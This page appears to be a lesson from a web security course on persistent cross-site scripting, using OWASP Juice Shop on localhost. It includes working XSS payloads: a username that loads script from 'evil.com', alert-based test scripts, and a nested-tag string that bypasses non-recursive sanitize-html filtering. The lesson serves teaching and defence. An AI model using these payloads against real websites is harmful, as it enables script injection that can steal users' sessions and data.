Main Content
Ep-5: What is Persistent XSS
Table Of Contents
Scope
- What is Persistent XSS (Cross-Site Scripting)?
- Where are common locations for Persistent XSS?
- How can XSS defenses be exploited?
- Live example via OWASP Juice Shop!
- Learn to leverage
npm audit
to check for node.js vulnerabilities
- Persistent XSS vs Reflected XSS
XSS Types
- Persistent
- Non-Persistent
Persistent XSS
- Typically stored in the database
- username
<script src='evil.com'></script>
- Also in local storage
- Very problematic when shared across multiple users
- Ex: Chat application where
username
is sent to multiple clients
- Other high risk areas
- Functionality that allows users to submit html markup
- Comments
Persistent XSS vs Reflected XSS
- Persistent XSS
- Much more dangerous
- Can attack all users of a site
- Doesn't have to involve an action from a user
- Reflected XSS
- Often requires an action from the victim
- Clicking on malicious link with XSS payload
- Payload is reflected back to the user
- Typically involves one victim
Assignment Scenario
- Exploit a Persistent XSS flaw by taking advantage of a XSS defense
- Aside: All assignment instructions assume Linux/macOS
- OWASP Juice Shop
Assignment 1: Persistent XSS
- Try to obtain Persistent XSS within http://localhost:3000/#/contact
- Port assumes that you leveraged the docker command
- Input (http://localhost:3000/#/contact)
<script>alert("I have XSS")</script>Outside Text
within the Comment
field
- Make sure to leave rating
- Output
- Given the output in the
Customer Feedback
section, how is the application handling XSS attacks?
- Within the context of this feature, why is this a bad practice?
Assignment 1: Persistent XSS (Answer)
- Instead of rejecting unexpected input, the application is sanitizing it
- This is very difficult to implement properly
- Hmm… How can this step be exploited?
- Alert
- If input is unexpected, fully reject it
- There is no reason why html markup should be placed within the
Comment
field
Assignment 2: XSS Sanitization Issues
- Given the application sanitizes the
script
tags within <script>alert("I
have XSS")</script>
…
- Can you insert anything around the
script
tags that would allow the XSS to continue?
- Lets explore how attackers could find this flaw
- Answer will be within the final assignment
- Through the browser, view Juice Shop's
package.json
- Unfortunately, this file is often easily available
- Hint
app.use(express.static(applicationRoot))
Assignment 4: Reconnaissance Through Npm Audit
- Upgrade npm to npm@6+
npm install npm@latest -g
cd
into the directory with the package.json
npm i --package-lock-only
npm audit > audit.txt
- What vulnerability within
sanitize-html
can be leveraged to exploit Assignment 2?
Assignment 4: Recon Through Npm Audit (Answer)
sanitize-html
doesn't sanitize recursively
Assignment 5: Persistent XSS
Assignment 5: Persistent XSS (Answer)
<<script>Foo</script>script>alert("XSS")</script>
- Alternative that doesn't work
<script<script>>alert("I stole your auth cookie")<</script>/script>
Persistent XSS Summation
Complete and Continue
0 comments